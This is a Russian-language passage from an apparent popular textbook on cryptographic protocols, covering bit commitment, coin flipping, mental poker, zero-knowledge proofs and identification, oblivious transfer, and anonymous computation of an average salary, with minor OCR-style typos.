    Информация о сделанном Антоном выборе фиксируется в виде обязательства, которое передается на хранение Борису. Обязательство представляет собой значение, которое, после того как Антон познакомит Бориса со своим выбором, Борис может предъявить Антону и потребовать, чтобы Антон преобразовал это значение и получил величину, известную Борису. Если Антон сумеет это сделать, значит мошенничества с его стороны проявлено не было.

    Антон может сделать предсказание, выполнив шаги протокола, который использует симметричную криптосистему:

    1. Борис, генерирует случайную битовую строку S и посылает ее Антону.

    2. Антон присоединяет бит b , значение которого он собирается предсказать, к S, шифрует полученную в результате битовую строку (S,b) при помощи симметричной криптосистемы E K и некоторого секретного ключа К, а затем отсылает результат обратно Борису.

    На этом завершается процесс предсказания. Поскольку Борис не может дешифровать полученное от Антона сообщение Е K ( S , b ), то предсказание, сделанное Антоном, остается для Бориса тайной за семью печатями.

    Теперь, если Антон пожелает ознакомить Бориса со своим предсказанием, они могут продолжить совместное выполнение следующих шагов протокола:

    1. Антон посылает Борису ключ К.

    2. С помощью К Борис расшифровывает Е K ( S , b ) и узнает значение b . Чтобы убедиться в честности Антона, Борис проверяет, содержит ли открытый текст расшифрованного сообщения сгенерированную им случайную битовую строку S.

    Если бы посланное Борису сообщение изначально не содержало случайной битовой строки, Антон мог бы впоследствии попытаться подобрать другой ключ, использование которого позволило бы ему получить вместо предсказанного значения b противоположное. Поскольку b принимает всего 2 возможных значения, сделать это будет очень просто. Однако при наличии в сообщении случайной битовой строки, сгенерированной Борисом, Антону придется подобрать ключ, который при расшифровании сообщения даст не только инвертированный бит b , но и S. Если Антон пользуется хорошей симметричной криптосистемой, то его шансы найти такой ключ будут пренебрежимо малы. Следовательно, Антон не сможет изменить предсказанное им значение после того, как сделает свой выбор, выполнив первые 2 шага протокола.

    Предсказание бита с помощью однонаправленной функции

    Антон может предсказать битовое значение, воспользовавшись свойствами. которыми обладают однонаправленные функции:

    Антон генерирует две случайные битовые строки S 1 и S 2;

    Антон присоединяет к сгенерированным S 1 и S 2 бит b , значение которою собирается предсказать;

    Антон вычисляет значение однонаправленной функции Н, используя в качестве аргумента битовую строку (S 1 , S 2 ,b), и вместе с S 1 отсылает Борису полученный результат.

    Теперь у Бориса имеется вся необходимая информация, которая не позволит Антону впоследствии изменить предсказанное значение b . Однако проверить правильность предсказания без участия Антона Борис не сможет. поскольку в этом случае ему придется вычислять H -1 (S 1 ,S 2 ,b).

    Когда потребуется, чтобы Антон ознакомил со своим предсказанием Бориса, им обоим необходимо будет продолжить выполнение следующих шагов протокола:

    1. Антон посылает Борису исходную битовую строку (S 1 ,S 2 ,b).

    2. Борис вычисляет H(S 1 ,S 2 ,b), а затем сравнивает вычисленное значение и S 1 со значением и случайной битовой строкой, присланными ему Антоном на шаге 3. В случае совпадения b действительно представляет собой значение, предсказанное Антоном на шаге 2.

    По сравнению с предсказанием бита при помощи симметричной криптосистемы, при предсказании бита с помощью однонаправленной функции не требуется, чтобы Борис посылал какие-либо сообщения Антону. А Антону необходимо отослать всего одно сообщение, чтобы сделать предсказание, и еще одно, чтобы Борис смог с этим предсказанием ознакомиться.

    Теперь, при предсказании бита с помощью однонаправленной функции. Борису уже не обязательно генерировать какие-либо случайные битовые строки, поскольку Антон использует для предсказания однонаправленную функцию и не сможет смошенничать, составив фальшивое сообщение (S 1 S ' 2 , b') такое, что H(S 1 S 2 , b') = H(S 1 ,S 2 ,b). Антон посылает Борису случайную битовую строку S 1 чтобы у Антона не было возможности путем подбора S 1 и S 2 добиться, чтобы изменилось b и чтобы при этом было сохранено значение H(S 1 ,S 2 ,b), которое Антон ранее отослал Борису. Храня S 1 в секрете от Бориса, Антон не дает Борису вычислить значения H(S 1 ,S 2 ,b) и H(S 1 ,S 2 ,b ' ), а затем определить b, сравнив эти значения с тем, что прислал ему Антон.

    Предсказание с помощью генератора псевдослучайных битовых последовательностей

    Для предсказания битового значения Антон может использовать генератор псевдослучайных битовых последовательностей:

    1. Борис генерирует случайную битовую строку S Б и посылает ее Антону.

    2. Антон вычисляет случайное начальное значение для генератора псевдослучайных битовых последовательностей. Затем для каждого бита присланном Борисом битовой строки S Б Антон отправляет Борису либо (а) выходное значение генератора псевдослучайных битовых последовательностей, если этот бит равен 1, либо (б) результат сложения выходного значения генератора псевдослучайных битовых последовательностей со значением, предсказанным Антоном, если соответствующий бит S Б равен 0.

    Когда Антон захочет раскрыть Борису свое предсказание, они должны буду: перейти к выполнению последних двух шагов протокола:

    1. Антон высылает Борису случайное начальное значение, вычисленное им для генератора псевдослучайных битовых последовательностей на шаге 2.

    2. Борис повторяет действия Антона, предпринятые им на шаге 2. чтобы убедиться в том, что Антон не смошенничал.

    Если сгенерированная Борисом случайная битовая строка является достаточно длинной, а генератор псевдослучайных битовых последовательностей. которым пользуется Антон, в требуемой степени непредсказуем, то у Антона практически нет шансов обмануть Бориса.

    16. Бросание монеты

    Бросание монеты

    Для разрешения неожиданно возникшего спорного вопроса Антон и Борис решают бросить монету. Однако и у того, и у другого при себе не оказалось ни одной. Тогда они решают "бросить" монету в уме: сначала Антон загадает, что выпадет — "орел" или "решка", а потом Борис подумает и объявит. какой стороной упала "брошенная" им монета. Спрашивается: могут ли Антон и Борис сделать это так, чтобы полностью быть уверенными в том. что никто из них не смошенничал?

    Могут, если воспользуются криптографическим протоколом, который заставит их действовать таким образом, что:

    Антону придется бросить монету прежде, чем Борис попытается предсказать, какой стороной она упадет;

    Антон не сможет изменить результат бросания монеты после того, как услышит, на какую сторону монеты сделал свою ставку Борис;

    Борис не узнает, что выпало — "орел" или "решка", до тех пор. пока не примет окончательное решение и не сообщит о нем Антону.

    Бросание монеты с помощью предсказания бита

    В этом случае криптографический протокол, которою должны придерживаться Антон и Борис при бросании монеты, выглядит следующим образом:

    1. Антон делает предсказание битового значения в соответствии с одной из схем, описанных в разделе "Предсказание бита",

    2. Борис пытается догадаться, какое значение предсказал Антон, и информирует о своей догадке Антона.

    3. Антон сообщает Борису предсказанное значение. Борис выигрывает, если его догадка была правильной.

    Бросание монеты с помощью однонаправленной функции

    Если Антон и Борис сумеют заранее договориться об использовании конкретной однонаправленной функции f(x), криптографический протокол бросания монеты будет выглядеть так:

    1. Антон выбирает случайное число х и вычисляет значение y = f(x).

    2. Антон посылает у Борису.

    3. Борис пытается догадаться, является ли х четным или нечетным числом. и сообщает о своей догадке Антону.

    4. Антон информирует Бориса о том, какое число х он выбрал.

    5. Борис проверяет, действительно ли f(x) = y, а также узнает, была ли верна его догадка.

    Здесь все зависит от свойств однонаправленной функции f. Если Антон вдруг сможет найти два числа х и х' такие, что х является четным, а х' — нечетным, и при этом y = f(x) = f(x'), то Борис всегда будет в проигрыше. Необходимо также, чтобы наименее значимый бит f(x) не зависел от х. Например, если f(x) будет четным в 90 процентах всех случаев, когда х является четным, Антон будет брать верх над Борисом почти всегда.

    Бросание монеты с помощью криптосистемы с открытым ключом

    В этом случае от алгоритмов шифрования (Е) и расшифрования (D) требуется, чтобы они были коммутативны, т. е.:

    D K1 (E K2 (E K1 (M) ) ) ) = Е К2 (М),

    где К 1 и К 2 — криптографические ключи, Р — открытый текст сообщения. Для симметричных криптоалгоритмов в общем случае это условие не выполняется, однако существуют алгоритмы шифрования с открытым ключом, для которых оно верно. Последние могут быть использованы в протоколе бросания монеты:

    1. Антон и Борис генерируют каждый для себя по паре ключей, состоящей из открытого и тайного ключа.

    2. Антон генерирует две случайные битовые строки Р 1 и Р 2, одна из которых означает, что при бросании монеты выпал "орел", а другая — что получилась "решка".

    3. При помощи своего открытого ключа Антон шифрует сначала Р 1 , а потом Р 2 , и отсылает оба полученных в результате шифрсообщения (E A (P 1 ) и E A (P 2 )) Борису.

    4. Борис выбирает одно из присланных ему Антоном шифрсообшений (для этой цели Борис может воспользоваться, например, известной считалкой "Эне, бене, раба, квинтер, минтер, жаба" или сходить за советом к астрологу). Борис шифрует выбранное шифрсообщение с помощью своего открытого ключа и отсылает результат (E Б (E A (P)) , где Р — это либо Р 1 , либо Р 2 ) Антону.

    5. Антон расшифровывает пришедшее от Бориса сообщение на своем тайном ключе и посылает то, что у него получилось ( D Б (E Б (P)) = E Б (P) обратно Борису.

    6. Борис расшифровывает это сообщение Антона ( D Б (E Б (P)) = P) и узнает, какой стороной упала монета. Затем Борис шлет Р Антону.

    7. Антон проверяет, действительно ли Р — это одна из тех двух случайных битовых строк, которые он сгенерирована на шаге 2.

    8. Чтобы окончательно убедиться в честности друг друга, Антон и Борис обмениваются парами ключей, которые они сгенерировали на шаге 1.

    Читателю предоставляется возможность самому доказать, что каждый из участников этого протокола немедленно обнаружит, если другой участник попытается смошенничать.

    Интересно отметить, что участники протокола узнают результат подбрасывания монеты не одновременно, а по очереди. Поэтому в некоторый момент времени один из участников знает, как "легла" подброшенная монета, а другой — еще нет. А следовательно, в случае неблагоприятного исхода, тот. кто уже знает результат, может повести себя неспортивно, отказавшись от дальнейшего выполнения шагов протокола.

    На практике протоколы бросания монеты часто используются для генерации сеансовых ключей. В этом случае Антон и Борис могут сгенерировать случайную битовую последовательность таким образом, что посторонние окажутся не в состоянии повлиять на ее выбор. Тем не менее при генерации сеансовых ключей с помощью протокола бросания монеты Антону и Борису все равно придется шифровать все свои сообщения, чтобы защититься от возможного подслушивания.

    Игра в покер

    Подобно тому, как Антон и Борис бросали монету, не имея при себе самом монеты, они могут сыграть в покер без колоды карт. Соответствующий криптографический протокол аналогичен протоколу, который помог Антону и Борису организовать бросание монеты — в обоих необходимо обеспечить, чтобы используемые алгоритмы шифрования к расшифрования были коммутативны.

    Отличие между этими протоколами состоит в том, что теперь Антону требуется сгенерировать, зашифровать и отослать Борису не 2 битовых последовательности, а 52 — по числу карт в воображаемой колоде. Среди них Борис случайным образом выбирает 5 битовых последовательностей, шифрует их при помощи своего открытого ключа и посылает Антону. Антон расшифровывает полученные последовательности и шлет обратно Борису, который тоже расшифровывает их. Затем Борис выбирает еще 5 битовых последовательностей и посылает Антону, который опять их расшифровывает. В результате и у Антона, и у Бориса на руках окажется по 5 карт, которыми они и будут играть друг против друга. Если потребуется, дополнительные карты могут быть розданы обоим игрокам по той же схеме.

    По окончании игры Антон и Борис открывают свои карты и обмениваются ключами, чтобы иметь возможность проверить, насколько честно они следовали правилам карточной игры. К сожалению, криптографические протоколы, предназначенные для игры в покер, устроены таким образом, что в ходе нее игроки могут слегка мошенничать. Характер этого мошенничества зависит от используемого криптоалгоритма. Например, при шифровании при помощи квадратичных вычетов играющие имеют возможность пометить несколько карт. Не бог весть что, но ведь покер — это такая игра, в которой даже небольшая порция дополнительной информации о сопернике может в конечном счете решить исход игры.

    17. Специальные криптографические протоколы

    Специальные криптографические протоколы

    Доказательство с нулевым разглашением конфиденциальной информации

    Антон: "Я знаю пароль для входа в компьютерную сеть Центробанка, рецепт приготовления "Байкала", а также почему Ельцин всегда выглядел так, будто только что проглотил живого лягушонка!"

    Борис: "Нет, не знаешь!"

    Антон: "Нет, знаю!"

    Борис: "Чем докажешь? "

    Антон: "Хорошо, я тебе все расскажу".

    Антон дол со шепчет что-то на ухо Борису.

    Борис: "Действительно интересно! Надо сообщить об этом газетчикам!"

    Антон: "Е-мое, как же я так лопухнулся..."

    К сожалению, в обычных условиях Антон может доказать Борису что знает какую-либо тайну, единственным способом — рассказав, и чем сое ют с. суть. Но тогда Борис автоматически узнает эту тайну и сможет поведан, о ней первому встречному. Есть ли у Антона возможность помешать Борису это сделать?

    Конечно есть. В первую очередь, Антону не следует доверять свою таит Борису. Но тогда как Антон сможет убедить Бориса, что действительно входит в число посвященных в эту тайну?

    Антону надо воспользоваться протоколом доказательства с нулевым paзглашением конфиденциальной информации. С помощью этого протокола Антон окажется в состоянии доказать Борису, что он обладает некой секретной информацией, однако сообщать данную информацию Борису будет совсем необязательно.

    Доказательство носит интерактивный характер. Борис задает Антону серию вопросов. Если Антон знает секрет, то ответит правильно на все заданные ему вопросы. Если не знает, вероятность правильного ответа на каждый из вопросов будет невелика. После примерно 10-ти вопросов Борис может твердо узнать, обманывает ли его Антон. При этом шансы Бориса извлечь для себя какую-либо полезную информацию о сути самого секрета практически равны нулю.

    Протокол доказательства с нулевым разглашением конфиденциальной информации

    Использование доказательства с нулевым разглашением конфиденциальной информации можно пояснить на конкретном примере. Предположим, что имеется пещера. Вход в пещеру находится в точке А, а в точке В пещера разветвляется на две половины — С и D. У пещеры есть секрет: только то;, км знает волшебные слова, может открыть дверь, расположенную между С и I).

    Антону волшебные слова известны, Борису — нет. Антон хочет доказан. Борису, что знает волшебные слова, но так, чтобы Борис по-прежнему оставался в неведении относительно этих слов. Тогда Антон может воспользоваться следующим протоколом:

    1. Борис стоит в точке А.

    2. По своему выбору Антон подходит к двери либо со стороны точки С, либо со стороны точки D.

    3. Борис перемещается в точку В.

    4. Борис приказывает Антону появиться или через левый проход к двери, или через правый.

    5. Антон подчиняется приказу Бориса, в случае необходимости используя волшебные слова, чтобы пройти через дверь.

    6. Шаги 1—5 повторяются n раз, где n — параметр протокола.

    Допустим, что у Бориса есть видеокамера, с помощью которой он фиксирует все исчезновения Антона в недрах пещеры и все его последующие появления. Если Борис покажет записи всех п экспериментов, произведенных им совместно с Антоном, могут ли эти записи послужить доказательством знания Антоном волшебных слов для другого человека (например, для Владимира)?

    Вряд ли. Владимир никогда не сможет удостовериться в том, что Антон каждый раз предварительно не сообщал Борису о своих намерениях, чтобы потом Борис приказывал ему выходить именно с той стороны двери, с какой Антон зашел. Или что из сделанной видеозаписи не вырезаны все неудачные эксперименты, в ходе которых Антон не смог выполнить распоряжения Бориса.

    Это означает, что Борис не в состоянии убедить Владимира, лично не присутствовавшего при проведении экспериментов в пещере, в том, что Антон действительно подтвердил свое знание секрета. А значит использованный Антоном протокол доказательства характеризуется именно нулевым разглашением конфиденциальной информации. Если Антон не знает волшебные слова, открывающие дверь в пещере, то, наблюдая за Антоном, не сможет ничего узнать и Борис. Если Антону известны волшебные слова, то Борису не поможет даже подробная видеозапись проведенных экспериментов. Во-первых, поскольку при ее просмотре Борис увидит только то, что уже видел живьем. А во-вторых, потому что практически невозможно отличить сфальсифицированную Борисом видеозапись от подлинной.

    Протокол доказательства с нулевым разглашением срабатывает в силу того. что не зная волшебных слов, Антон может выходить только с той стороны, с которой зашел. Следовательно лишь в 50% всех случаев Антон сумеет обмануть Бориса, догадавшись, с какой именно стороны тот попросит его выйти. Если количество экспериментов равно n , то Антон успешно пройдет все испытания только в одном случае из 2". На практике можно ограничиться n =16. Если Антон правильно исполнит приказ Бориса во всех 16-ти случаях. значит он и правда знает секрет волшебных слов.

    Пример с пещерой является наглядным, но имеет существенный изъян. Борису значительно проще проследить, как в точке В Антон поворачивает и одну сторону, а потом появляется с противоположной стороны. Протокол доказательства с нулевым разглашением здесь попросту не нужен.

    Поэтому предположим, что Антону известны не какие-то там волшебные слова, типа "Сезам, откройся". Нет, Антон владеет более интересной информацией — он первым сумел найти решение этой трудно решаемой задачи. Чтобы доказать данный факт Борису, Антону совсем не обязательно всем и каждому демонстрировать свое решение. Ему достаточно применить следующий протокол доказательства с нулевым разглашением конфиденциальной информации:

    1. Антон использует имеющуюся у него информацию и сгенерированное случайное число, чтобы свести трудно решаемую задачу к другой трудно решаемой задаче, изоморфной исходной задаче. Затем Антон решает эту новую задачу.

    2. Антон задействует протокол предсказания бита для найденного на шаге 1 решения, чтобы впоследствии, если у Бориса возникнет необходимость ознакомиться с этим решением, Борис мог бы достоверно убедиться, что предъявленное Антоном решение действительно было получено им па шаге 1.

    3. Антон показывает новую трудно решаемую задачу Борису.

    4. Борис просит Антона или доказать, что две трудно решаемые задачи (старая и новая) изоморфны, или предоставить решение, которое Антон должен был найти на шаге 1, и доказать, что это действительно решение задачи, к которой Антон свел исходную задачу на том же шаге.

    5. Антон выполняет просьбу Бориса.

    6. Антон и Борис повторяют шаги 1—6 n раз, где n — параметр протокола.

    Трудно решаемые задачи, способ сведения одной задачи к другой, а также случайные числа должны по возможности выбираться так, чтобы у Бориса не появилось никакой информации относительно решения исходной задачи .даже после многократного выполнения шагов протокола.

    Не все трудно решаемые задачи могут быть использованы при доказательстве с нулевым разглашением конфиденциальной информации, однако большинство из них вполне пригодны для таких целей. Примерами могут служить отыскание в связном графе цикла Гамильтона (замкнутого пути, проходящего через все вершины графа только один раз) и определение изоморфизма графов (два графа изоморфны, если они отличаются только названиями своих вершин).

    Параллельные доказательства с нулевым разглашением конфиденциальной информации

    Обычный протокол доказательства с нулевым разглашением конфиденциальной информации требует, чтобы Антон и Борис последовательно повторили его шаги n раз. Можно попробовать выполнять действия, предусмотренные этим протоколом, одновременно:

    1. Антон использует имеющуюся у него информацию и n сгенерированных случайных чисел, чтобы свести трудно решаемую задачу к n другим трудно решаемым задачам, изоморфным исходной задаче. Затем Антон решает эти n новых задач.

    2. Антон задействует протокол предсказания бита для найденных на шаге 1 n решений, чтобы впоследствии, если у Бориса возникнет необходимость ознакомиться с этими решениями, Борис мог бы достоверно убедиться, что предъявленные Антоном решения действительно были получены им на шаге 1.

    3. Антон показывает n новых трудно решаемых задач Борису.

    4. Для каждой из n новых трудно решаемых задач Борис просит Антона или доказать, что она изоморфна исходной трудно решаемой задаче или предоставить решение этой задачи, которое Антон должен был найти на шаге 1, и доказать, что оно действительно является ее решением.

    5. Антон выполняет все просьбы Бориса.

    На первый взгляд параллельный протокол обладает тем же свойством нулевого разглашения конфиденциальной информации, что и обычный. Однако строгого доказательства этого факта еще не найдено. А пока с полной определенностью можно сказать лишь одно: некоторые интерактивные протоколы доказательства с нулевым разглашением в некоторых ситуациях можно выполнять параллельно, и от этого они не утрачивают свойство нулевого разглашения конфиденциальной информации.

    Неинтерактивные протоколы доказательства с нулевым разглашением конфиденциальной информации

    Постороннего человека, не участвующего в выполнении шагов интерактивного протокола доказательства с нулевым разглашением конфиденциальной информации, невозможно убедить в том, в чем в ходе реализации протокола убеждается Борис, а именно — что Антон действительно владеет конфиденциальной информацией. Чтобы преодолеть этот недостаток, потребуется применить неинтерактивный протокол, в котором вместо Бориса используется однонаправленная функция:

    1. Антон использует имеющуюся у него информацию и n сгенерированных случайных чисел, чтобы свести трудно решаемую задачу к n другим трудно решаемым задачам, изоморфным исходной задаче. Затем Антон решает эти n новых задач.

    2. Антон задействует протокол предсказания бита для найденных на шаге 1 n решений.

    3. Антон подает n обязательств, полученных им на шаге 2, на вход однонаправленной функции.

    4. Для каждой i-й трудно решаемой задачи, к которой Антон свел исходную задачу на шаге 1, он берет i-й бит значения, вычисленного с помощью однонаправленной функции, и (а) если этот бит равен 1, то Антон доказывает, что исходная и i-я задачи изоморфны, или (б) если этот бит равен 0, то Антон помешает в общедоступную базу данных решение i-й задачи, вычисленное на шаге 1.

    5. Антон передает в общедоступную базу данных все обязательства, которые были получены им на шаге 2.

    6. Борис, Владимир или любое другое заинтересованное лицо могут проверить правильность выполнения Антоном шагов 1—5.

    Удивительно, но факт: Антон предоставляет в общее пользование данные. которые позволяют любому убедиться в том, что он владеет некоторым огретом, и которые одновременно с этим не содержат никакой информант: о сути самого секрета.

    Роль Бориса в этом протоколе исполняет однонаправленная функция. Если Антон не знает решения трудно решаемой задачи, он все равно может выполнить действия; предусмотренные или пунктом (а), или пунктом (б) шага 4 протокола, но отнюдь не обоими пунктами сразу. Поэтому, чтобы смошенничать, Антону придется научиться предсказывать значения однонаправленной функции. Однако если функция действительно является однонаправленной, Антон не сможет ни догадаться, какими будут ее значения. ни повлиять на нее с тем, чтобы на ее выходе получилась нужная Анют битовая последовательность.

    В отличие от интерактивного протокола, здесь требуется большее количество итераций. Поскольку генерация случайных чисел возложена на Ангина. подбором этих чисел он может попытаться добиться, чтобы на выходе одно направленной функции получилась битовая последовательность нужно: и ему вида. Ведь даже если Антон не знает решения исходной трудно решаемой задачи, он всегда в состоянии выполнить требования пли пункта (а). или пункта (б) шага 4 протокола. Тогда Антон может попытается догадаться. на какой из этих пунктов падет выбор, и выполнить шаги 1—3 протокола. А если его догадка неверна, он повторит все сначала. Именно поэтому в неинтерактивных протоколах необходим больший запас прочности, чем в интерактивных. Рекомендуется выбирать n = 64 или даже n = 128.

    Доказано, что в общем случае любое математическое доказательство может быть соответствующим образом преобразовано в доказательство с пулевым разглашением конфиденциальной информации. А это означает, что теперь математику вовсе не обязательно публиковать результаты своих научных исследований. Он может доказать своим коллегам, что нашел решение каком-то математической проблемы, не раскрывая перед ними сути найденного решения.

    Удостоверение личности с нулевым разглашением конфиденциальной информации

    В повседневной жизни людям регулярно приходится удостоверять свою личность. Обычно они делают это путем предъявления паспортов, водительских прав, студенческих билетов и других подобных документов. Такой документ обычно имеет некоторую индивидуальную отличительную особенность, которая позволяет однозначно связать его с определенным лицом. Чаще всего это фотография, иногда — подпись, реже — отпечатки пальцев или рентгеновский снимок зубов. Можно ли делать то же самое с помощью криптографии?

    Конечно. В этом случае для удостоверения личности Антона используется его тайный криптографический ключ. Применяя доказательство с нулевым разглашением конфиденциальной информации, Антон может продемонстрировать любому, что знает свой тайный ключ, и тем самым однозначно идентифицировать себя. Идея цифровой идентификации весьма заманчива и таит в себе массу разнообразных возможностей, однако у нее есть ряд существенных недостатков.

    Во-первых, злоумышленник Зиновий под фальшивым предлогом может попросить Антона предъявить свое цифровое удостоверение личности. Одновременно с помощью современных средств связи Зиновий инициализирует процесс идентификации Антона совсем в другом месте и будет переадресовывать все запросы из этого места Антону, а данные им ответы — пересылать обратно. Например, Зиновий может связаться с ювелирным магазином и выдав себя за Антона, оплатить из его кармана весьма дорогую покупку.

    Во-вторых, Зиновий может запросто обзавестись несколькими тайными ключами, а следовательно и заиметь соответствующее число цифровых удостоверений личности. Одно из них он использует единственный раз для финансовой аферы и больше им пользоваться не будет. Свидетелем преступления станет человек, которому Зиновий предъявит свое "одноразовое" удостоверение личности, однако доказать, что это был именно Зиновий, не удастся. Ведь предусмотрительный Зиновий никогда не удостоверял таким образом свою личность прежде. Не станет он делать этого и впредь. А свидетель сможет только показать, какое удостоверение личности было предъявлено преступником. Однозначно связать это удостоверение с личностью Зиновия будет нельзя.

    В-третьих, Антон может попросить Зиновия одолжить на время его цифровое удостоверение личности. Мол, Антону надо съездить в Соединенные Штаты, а поскольку он — бывший сотрудник советской разведки, работавший против США, американское правительство наотрез отказывает ему во въездной визе. Зиновий с радостью соглашается: после отъезда Антона он сможет пойти практически на любое преступление, поскольку обзавелся "железным" алиби. С другой стороны, ничто не мешает совершить преступление Антону. Кто поверит .лепету Зиновия о том, что он одолжил свое цифровое удостоверение личности какому-то другому человеку?

    Избавиться от перечисленных недостатков помогают дополнительные меры предосторожности. В первом случае мошенничество стало возможным, поскольку Зиновий, проверяя цифровое удостоверение личности Антона, мог одновременно общаться с внешним миром по телефону или по радио. Если Зиновия поместить в экранированную комнату без всяких средств связи. никакого мошенничества не было бы.

    Чтобы исключить вторую форму мошенничества, необходимо ввести ограничение на количество ключей, которые человеку разрешается использовать, чтобы удостоверить свою личность (как правило, такой ключ должен существовать в единственном числе). И наконец, чтобы не допустить третий вид мошенничества, требуется либо заставить всех граждан удостоверять свою личность как можно чаще (например, у каждого фонарного столба, как это делается в тоталитарных государствах), либо дополнить средства цифровой идентификации другими идентификационными методами (например, проверкой отпечатков пальцев).

    18. Неосознанная передача информации

    Предположим, что Борис безуспешно пытается разложить на простые множители 700-битовое число. При этом ему известно, что данное число является произведением семи 100-битовых множителей. На помощь Борису приходит Антон, который случайно знает один из множителей. Антон Предлагает Борису продать этот множитель за 1000 руб. — по 10 руб. за бит. Однако у Бориса имеются в наличии лишь 500 руб. Тогда Антон выражает желание отдать Борису 50 бит за половину цены. Борис сомневается, поскольку даже купив эти 50 бит, он все равно не сможет убедиться, что они действительно являются частью искомого множителя, пока не узнает все его биты целиком.

    Чтобы выйти из тупика, Антон и Борис должны воспользоваться протоколом неосознанной передачи информации. В соответствии с ним Антон передает Борису несколько шифрованных сообщений. Борис выбирает одно из них и отсылает все сообщения обратно. Антон расшифровывает выбранное Борисом сообщение и снова отсылает Борису. При этом Антон остается в неведении относительно того, какое именно сообщение выбрал для себя Борис.

    Протокол неосознанной передачи информации не решает всех проблем, которые стоят перед Антоном и Борисом, желающими заключить сделку о купле-продаже одного из множителей 700-битового числа. Чтобы сделка стала честной, Антон должен будет доказать Борису, что проданные 50 бит действительно являются частью одного из простых множителей, на которые раскладывается это число. Поэтому Антону, скорее всего, придется дополнительно воспользоваться еще и протоколом доказательства с нулевым разглашением информации.

    Следующий протокол позволяет Антону послать два сообщения, одно из которых будет принято Борисом, но какое именно, Антон так и не узнает.

    1. Антон генерирует две пары ключей, состоящих из открытого и тайного ключа, и отсылает оба открытых ключа Борису.

    2. Борис генерирует ключ для симметричного алгоритма (например, для DES-алгоритма), шифрует этот ключ при помощи одного из открытых ключей, присланных Антоном, и отсылает обратно Антону.

    3. Антон расшифровывает ключ Бориса с помощью каждого из двух своих тайных ключей, сгенерированных им на шаге 1, и получает две битовых последовательности. Одна из них является подлинным ключом для DES-алгоритма, а другая содержит произвольный набор бит.

    4. Антон шифрует два сообщения по DES-алгоритму, используя в качестве ключей обе битовые последовательности, которые были получены им на шаге 3, и отсылает результаты шифрования Борису.

    5. Борис расшифровывает оба присланных Антоном сообщения на ключе, сгенерированном на шаге 2, и обретает два открытых текста сообщения, один из которых представляет собой настоящую тарабарщину, а второй — содержательное послание.

    Теперь у Бориса имеется одно из двух сообщений Антона, однако последний не может со всей определенностью сказать, какое именно. К сожалению, если в протоколе не предусмотреть дополнительный проверочный шаг, у Антона будет возможность смошенничать (например, зашифровать на шаге 4 два идентичных сообщения). Поэтому необходим еще один, заключительный, шаг протокола:

    6. После того как отпала надобность хранить в секрете второе сообщение (к примеру, у Бориса нашлись еще 500 руб., чтобы выкупить у Антона оставшуюся половину множителя), Антон предоставляет Борису свои тайные ключи, чтобы тот мог убедиться в честности Антона.

    Протокол защищен от атаки со стороны Антона, поскольку на шаге 3 Антон не в состоянии отличить произвольную битовую последовательность от подлинного ключа DES-алгоритма, сгенерированного Антоном. Протокол также обеспечивает защиту от атаки со стороны Бориса, т. к. у него нет тайных ключей Антона, чтобы определить битовую последовательность, использованную Антоном в качестве ключа DES-алгоритма для шифрования второго сообщения.

    Конечно, протокол неосознанной передачи информации отнюдь не гарантирует, что Антон не пошлет Борису какие-нибудь бессмысленные послания, типа "Борис — лох" или "Мяу-мяу", вместо битов одного из семи простых множителей, на которые раскладывается исходное 700-битовое чист. Или что Борис вообще захочет с ними ознакомиться и примет участие и выполнении шагов этого протокола.

    На практике протокол неосознанной передачи информации используется довольно редко. Обычно он служит в качестве одного из строительных блоков для построения других протоколов.

    19. Анонимные совместные вычисления

    Иногда бывает так, что группе людей требуется совместно вычислить некоторую функцию от многих переменных. Каждый участник вычислительною процесса является источником значений одной или нескольких переменных этой функции. Результат вычислений становится известен всем членим группы, однако ни один из них не в состоянии выяснить что-либо о знамениях, поданных на вход функции другим членом группы.

    Вычисление средней зарплаты

    Допустим, что начальник отдела приказал своим подчиненным подсчитан, среднюю зарплату в отделе. Начальник осведомлен о зарплате любого сотрудника, но слишком занят более важными делами, чтобы отвлекаться па подобные пустяки. Каждый сотрудник прекрасно знает собственную зарплату, но категорически не желает сообщать о ней сослуживцам. Чтобы сотрудники отдела (Антон, Борис, Владимир и Георгий) смогли просуммировать свои оклады, сохранив их в тайне от других, им следует воспользоваться следующим протоколом:

    1. Антон генерирует случайное число, прибавляет его к своей зарплате, шифрует полученную сумму при помощи открытого ключа Бориса и затем передает то, что у него получилось, Борису.

    2. На своем тайном ключе Борис расшифровывает результат, вычисленный Антоном, прибавляет к нему свою зарплату, шифрует полученную сумму при помощи открытого ключа Владимира и затем передает то, что у него получилось, Владимиру.

    3. На своем тайном ключе Владимир расшифровывает результат, вычисленный Борисом, прибавляет к нему свою зарплату, шифрует полученную сумму при помощи открытого ключа Георгия и затем передает то. что у него получилось, Георгию.

    4. На своем тайном ключе Георгий расшифровывает результат, вычисленный Владимиром, прибавляет к нему свою зарплату, шифрует подученную сумму при помощи открытого ключа Антона и затем передает то. что у него получилось, Антону.

    5. На своем тайном ключе Антон расшифровывает результат, вычисленный Георгием, вычитает из него случайное число, сгенерированное на шаге 1, делит на количество сотрудников отдела и получает искомую среднюю зарплату в отделе.

    Точность вычисления средней зарплаты зависит от честности каждого сотрудника. Если хотя бы один из участников протокола соврет относительно своего жалованья, итоговое значение будет неверным. Особенно большими потенциальными возможностями для злоупотреблений обладает Антон. На шаге 5 он может вычесть любое число, какое только придет ему в голову, и никто не заметит подделки. Поэтому необходимо обязать Антона воспользоваться какой-либо из схем предсказания бита. Однако, если от Антона потребуется раскрыть перед всеми случайное число, сгенерированное им на шаге 1, зарплату Антона узнает Борис. Это значит, что начальнику отдела все же придется отвлечься и самому выполнить вычисления, предусмотренные шагом 2 протокола. Ведь он и так знает зарплату Антона.

    Как найти себе подобного

    Антон любит играть с резиновыми куклами, изготовители которых потрудились на славу, тщательно скопировав в натуральную величину определенные особенности анатомического строения женщины. А Борису нравится во всех красочных подробностях наблюдать за жизнью соседей из многоквартирного дома напротив при помощи современных оптических приспособлений. Оба тщательно скрывают свои пристрастия от родственников, друзей и коллег по работе, но очень хотели бы найти людей, которые разделяют их интересы.

    Фирма "Совместные анонимные вычисления" готова оказать необходимую помощь Антону, Борису и им подобным в подборе таких же чудаков, как они сами. Сотрудники фирмы составили всеобъемлющий список всех человеческих чудачеств, каждое из которых снабжено уникальным идентификатором из семи цифр. Обратившись в фирму, Антон и Борис принимают участие в выполнении шагов некоторого протокола, после чего узнают. испытывают ли они склонность к одним и тем же чудачествам. При положительном ответе они смогут связаться друг с другом. Если ответ будет отрицательным, об их необычных пристрастиях не узнает никто, включая сотрудников "Совместных анонимных вычислений".

    Протокол выглядит так:

